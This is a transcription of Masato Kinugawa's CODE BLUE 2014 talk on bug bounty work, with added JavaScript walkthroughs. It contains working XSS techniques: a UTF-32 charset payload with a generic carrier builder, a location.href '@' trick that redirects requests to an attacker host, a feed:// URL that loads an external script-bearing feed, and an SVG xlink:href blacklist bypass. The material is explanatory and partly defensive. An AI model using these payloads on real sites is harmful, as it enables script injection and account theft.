Bug-hunter's Joy, Masato Kinugawa

CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa



Page 1: CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa

Bug-hunter's Joy

Masato Kinugawa

Page 2:

Name: Masato Kinugawa
Nationality: Japanese (maybe)
Hobby: Listening to music, and XSS
Profession: Bug-hunter

Page 3:

First: Bug-hunter's life and bounty programs

Second: Delightful bugs

Third: The reasons why I became a bug-hunter

Page 4:

Bug-hunter's Life and Bounty Programs

Page 5:

Workplace: Home
Working hours: Any time I want
Work: Finding security bugs
Income: Bug bounty

➡ Does it make enough money to live?

Page 7:

27135346 (JPY) = $142723 ($1 = 120 JPY)

Page 8:

27135346 (JPY) = $142723 ($1 = 120 JPY) (in octal digits: 6,077,158 JPY, about $50,643, in decimal)

Page 9:

- Google launched its program in 2010
- Followed by many companies

Page 10:

- Google Vulnerability Reward Program
- 1 bug = $100 to $20,000

Total bounties: $130,803.7

Number of bugs reported: 127 (191 including duplicates and/or unrewarded ones)

Page 12:

Even more motivated by the increased bounty rates! $

Page 13:

I am actually a night owl…

Page 15:

- Quick response ever since the program launched.
- Considers not only the severity, but also how "interesting" the bug is.
- Requires only a simple explanation for them to understand the problem.
- Provides fun to the reporters.

Page 17:

- The most important domain of Google
- Bounty was $5,000 (exceeding the regulated maximum amount at that time)

Page 18:

https://accounts.google.com/example?oe=utf-32

HTTP/1.1 200 OK
Alternate-Protocol: 443:quic,p=0.01
Cache-Control: private, max-age=0
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-32
...

- The character code (charset) of the response can be set from the URL (the oe parameter)
- UTF-32 could be set

Page 19:

∀㸀㰀script㸀alert(1)㰀/script㸀

Page 20:

① Array of the bytes
② Character code of the page
③ Handling of 0x00 characters

Page 21:

① Array of the bytes

00 00 22 00  00 00 3E 00  00 00 3C 00  00 00 00 73  00 00 00 63  00 00 00 72  00 00 00 69  00 00 00 70  00 00 00 74  00 00 3E 00  00 00 00 61  00 00 00 6C  00 00 00 65  00 00 00 72  00 00 00 74  00 00 00 28  00 00 00 31  00 00 00 29  00 00 3C 00  00 00 00 2F  00 00 00 73  00 00 00 63  00 00 00 72  00 00 00 69  00 00 00 70  00 00 00 74  00 00 3E 00

∀㸀㰀script㸀alert(1)㰀/script㸀

In UTF-32, 1 character requires 4 bytes.

Page 22:

② Character code of the page

IE does not support UTF-32 ➡ the character code is "recognized" as something else, and the same bytes as on Page 21 are decoded under that encoding instead.

Page 23:

This "super great" web site provides the support status of character codes in all web browsers: http://l0.cm/encodings/table/

Page 24:

③ Handling of 0x00 characters

IE (<= 9) ignores the 00 bytes ➡ each "00" is understood as nothing, so the UTF-32 bytes from Page 21 are read as:

"><script>alert(1)</script>
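The three steps above (the byte array, the encoding the browser actually applies, and what becomes of the 0x00 bytes), worked through in code. This is an added example, not code from the slides: it builds the carrier string for an arbitrary ASCII payload (generalising the single payload on the slide), encodes it as UTF-32BE, and simulates a parser that drops 0x00 bytes. The set of characters the server escapes (`"`, `<`, `>`) and the null-dropping model of IE <= 9 are assumptions for illustration.

```javascript
// Added example (not from the slides): build a UTF-32 "carrier" string whose
// non-null bytes spell an ASCII payload, then simulate a parser that does not
// understand UTF-32 and simply drops 0x00 bytes (the IE <= 9 behaviour the
// slides describe).  ESCAPED and the null-dropping model are assumptions.

// Characters the server HTML-escapes in the reflected parameter (assumed).
const ESCAPED = new Set(['"', '<', '>']);

// For each payload byte c that would be escaped, substitute the code point c << 8
// ('"' 0x22 -> U+2200, '>' 0x3E -> U+3E00, '<' 0x3C -> U+3C00): it is an ordinary
// non-ASCII character to the server, but its UTF-32BE form 00 00 cc 00 still
// carries the byte cc.  Other ASCII goes through unchanged (00 00 00 cc).
function buildCarrier(payload, escaped) {
  escaped = escaped || ESCAPED;
  let out = '';
  for (const ch of payload) {
    const c = ch.codePointAt(0);
    if (c > 0x7f) throw new Error('payload must be ASCII');
    out += escaped.has(ch) ? String.fromCodePoint(c << 8) : ch;
  }
  return out;
}

// UTF-32BE encoder (TextEncoder only does UTF-8, so encode by hand).
function utf32be(str) {
  const bytes = [];
  for (const ch of str) {
    const cp = ch.codePointAt(0);
    bytes.push((cp >>> 24) & 0xff, (cp >>> 16) & 0xff, (cp >>> 8) & 0xff, cp & 0xff);
  }
  return Uint8Array.from(bytes);
}

function hex(bytes) {
  return Array.from(bytes, b => b.toString(16).padStart(2, '0').toUpperCase()).join(' ');
}

// What a parser that ignores 0x00 bytes and reads the rest as ASCII ends up with.
function dropNullBytes(bytes) {
  let s = '';
  for (const b of bytes) if (b !== 0) s += String.fromCharCode(b);
  return s;
}

const payload = '"><script>alert(1)</script>';
const carrier = buildCarrier(payload);   // '∀㸀㰀script㸀alert(1)㰀/script㸀'
const bytes = utf32be(carrier);
console.log(carrier);
console.log(hex(bytes));                 // 00 00 22 00 00 00 3E 00 00 00 3C 00 ...
console.log(dropNullBytes(bytes));       // "><script>alert(1)</script>
```

The server-side check that closes this class of bug is the one the slides imply: never let a request parameter choose the response charset, or restrict it to encodings every supported browser actually decodes, and always emit the charset in the Content-Type header so nothing is left to sniffing.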

Page 25:

(Screenshot: the IE alert dialog, "Message from the web page")

Page 26:

Seek browser and plug-in bugs also

Page 27:

- 28.7% of the total number of bugs I reported were browser or plug-in bugs
- 87% of those are in IE

Page 28:

- They take longer to fix
- Even if fixed, the fix is not likely to be applied to other IE versions

Therefore: something is required at the web service level

Page 29:

location.href is the JavaScript property that gives the URL of the page.

http://example.com/ ➡ location.href ➡ http://example.com/

Page 30:

http://evil%2F@example.com/ ➡ location.href is http://evil/@example.com/

The part of the URL before @ is automatically decoded! ➡ It produces a URL that points to an external web site.

Page 31:

All code that uses location.href as a pointer to its own domain is potentially vulnerable.

Therefore: I added characters before "@", then checked whether any web page sends a request to the external site.

Page 32:

http://evil%2F@example.com/
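The hunt described on Pages 29 to 32, as an added example that is not code from the slides: a model of the browser behaviour the slides describe (the userinfo before "@" comes back percent-decoded in location.href), a typical page-script pattern that derives a sibling URL from location.href and so ends up requesting the attacker's host, and a hardened version that assembles the URL from parsed components and checks the host. The slides do not name the browser; the model, the "load app.js next to the page" pattern and the expected-host check are assumptions for illustration, while the hosts evil and example.com are the slides' own.

```javascript
// Added example (not from the slides): how a URL derived from location.href ends up
// pointing at an attacker's host when the browser hands back the userinfo part
// (everything before '@') percent-decoded.  ieHref() is a model of that behaviour,
// and the "load app.js next to the current page" helpers are assumed patterns.

// Model of the browser behaviour: userinfo is reported decoded, so
// 'http://evil%2F@example.com/' is reported as 'http://evil/@example.com/'.
function ieHref(typedUrl) {
  const m = /^(https?:\/\/)([^@\/]*)@(.*)$/.exec(typedUrl);
  return m ? m[1] + decodeURIComponent(m[2]) + '@' + m[3] : typedUrl;
}

// Vulnerable pattern: treat location.href as an opaque string and build a
// same-directory URL from it.  Once the string reads 'http://evil/@example.com/'
// its authority is 'evil', so the request goes to the attacker.
function scriptSrcFromHref(href) {
  const base = href.slice(0, href.lastIndexOf('/') + 1);
  return base + 'app.js';
}

// Hardened: assemble the URL from parsed components and refuse to continue if the
// host is not the one this page is supposed to be served from.
function scriptSrcFromComponents(href, expectedHost) {
  const u = new URL(href);
  if (u.host !== expectedHost) throw new Error('unexpected host: ' + u.host);
  const dir = u.pathname.slice(0, u.pathname.lastIndexOf('/') + 1);
  return u.protocol + '//' + u.host + dir + 'app.js';
}

function hostOf(url) { return new URL(url).host; }

const typed = 'http://evil%2F@example.com/';
const href = ieHref(typed);                       // http://evil/@example.com/
console.log(href);
console.log(hostOf(scriptSrcFromHref(href)));     // evil
try {
  scriptSrcFromComponents(href, 'example.com');
} catch (e) {
  console.log(e.message);                         // unexpected host: evil
}
```

In a real page the hardened variant would read location.protocol, location.host and location.pathname directly rather than re-parse location.href; it parses the string here only because the example has no window object. The point is the same either way: the host you end up contacting is whatever the string's authority says, so compare it against the host you expect before using it.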

Page 33:

- Found a fatal bug at the same time
- It exists in feed:// URLs, which represent RSS
- Can make any domain load an unrelated feed by customizing the part of the URL before @
- Put scripts in the unrelated feed, and the XSS works on the domain that loaded it

Therefore: we can enforce XSS on any web site \(^o^)/ yeah☆

Page 34:

In feed:// URLs, characters that can run scripts are restricted (= a blacklist).

Things to do: it is easy; just get past the blacklist!

Page 35:

<a href="javascript:alert(1)">XSS</a>
↓
<a>XSS</a>

Beeping! (the blacklist catches it)

Find out which characters can pass through, based on the character-removal pattern.

Page 36:

<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" /></a></svg>

Silence… (the blacklist does not catch it)
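Why the SVG variant on Page 36 gets through where the plain anchor on Page 35 does not, as an added example (this is not the real feed-view filter, whose internals the slides do not show): a toy blacklist that only knows about an attribute literally named href on `<a>`, the xlink:href form slipping past it unchanged, and an allowlist that keys on the attribute's local name and the URL scheme instead. The filter logic and the extra sample inputs are assumptions for illustration; the two payloads are the slides' own.

```javascript
// Added example (not from the slides and not the real feed-view filter): a toy
// blacklist that strips href="javascript:..." from <a> elements, the xlink:href
// form that slips past it, and an allowlist check that catches both.  The filter
// logic and the extra sample markup are assumptions for illustration.

const ATTR = /([\w:.-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;   // name="v" or name='v'
const tidy = tag => tag.replace(/\s+>/, '>');               // space left by a removed attribute

// Scheme of a URL value, ignoring the whitespace/control characters browsers skip.
function scheme(value) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(value.replace(/[\u0000-\u0020]/g, ''));
  return m ? m[1].toLowerCase() : null;
}

// Blacklist: only attributes literally named "href", and only on <a ...> tags.
function blacklistSanitize(html) {
  return html.replace(/<a\b[^>]*>/gi, tag =>
    tidy(tag.replace(ATTR, (full, name, dq, sq) =>
      name.toLowerCase() === 'href' && scheme(dq !== undefined ? dq : sq) === 'javascript' ? '' : full
    ))
  );
}

// Allowlist: on every element, any attribute whose local name is href (href,
// xlink:href, ...) may only carry an http(s) or relative URL; anything else is removed.
const ALLOWED_SCHEMES = new Set(['http', 'https', null]);   // null = relative URL
function allowlistSanitize(html) {
  return html.replace(/<[a-z][^>]*>/gi, tag =>
    tidy(tag.replace(ATTR, (full, name, dq, sq) => {
      const local = name.toLowerCase().split(':').pop();
      if (local !== 'href') return full;
      return ALLOWED_SCHEMES.has(scheme(dq !== undefined ? dq : sq)) ? full : '';
    }))
  );
}

const plain = '<a href="javascript:alert(1)">XSS</a>';
const svg = '<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)">'
          + '<rect width="1000" height="1000" /></a></svg>';
console.log(blacklistSanitize(plain));   // <a>XSS</a>      (Beeping!)
console.log(blacklistSanitize(svg));     // unchanged       (Silence...)
console.log(allowlistSanitize(svg));     // xlink:href removed
```

The regexes stand in for a real HTML parser only to keep the example self-contained; the design point survives the substitution: a filter that enumerates bad names and bad elements has to know every spelling the browser accepts (xlink:href, the namespace-prefixed form here), whereas one that enumerates good schemes only has to know its own.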

Page 37:

feed://l0.cm%2Fcb.rss%23@example.com/

Page 38:

feed://l0.cm%2Fcb.rss%23@example.com/

alert('CODE BLUE、2回目開催おめでとう!\n'+document.domain+'から')

(Congratulations on the second CODE BLUE! from <document.domain>)

Page 39:

- Web applications are put in jeopardy by character codes, browser behaviors / bugs, and so on…
- Finding mysteriously complicated bugs is the ultimate delight.

Want to see more? http://masatokinugawa.l0.cm/

Page 41:

- Grew up in touch with computers.
- Loved to disassemble anything.
- Debuted as an XSS "attacker" in the 6th grade.

Page 42:

- Grew up in touch with computers. ➡ I got to know what binary was in 2009
- Loved to disassemble anything ➡ Don't love it (so much)
- Debuted as an XSS "attacker" in the 6th grade ➡ I got interested in security in 2009

Page 43:

Decided to do what I want, in my way

~2009: A lot happened
2010: Left computer vocational school

Page 44:

What I want to do: seeking vulnerabilities

Found so many!

Soon after, Google launched its bug bounty program

Spent all waking hours finding vulnerabilities.

Page 46:

- Extension of what I want to do
- Found myself a bug-hunter, one day

Wish for the future…

Bug-hunting house-husband? ➡ Need to gain girl-hunting skills too ☺

Page 47:

- Must spend most of the time repeating unsophisticated verification tests
- No income unless I find something

However…

- The feeling of accomplishment is great, as what I achieve directly becomes money
- Nothing in the world feels as delightful as treasure hunting.
- Abnormal behaviors are great fun to see

Page 48:

The finding skill is all you need ➡ Can concentrate on improving that skill
Can do it by yourself ➡ Almost no human-relationship issues
Can do it at home ➡ No commuting time
Can work at your own pace ➡ Can do it when you want

Page 49:

For those who are trying to find their way...

"Hobby": "Listening to music" as a hobby; "Bug-hunting" as a hobby (same as above)

Do anything you want! Then you may find your own way.

Page 50:

Understood?!

Page 51:

Thank you!

Contact
@kinugawamasato
✉ masatokinugawa [at] gmail.com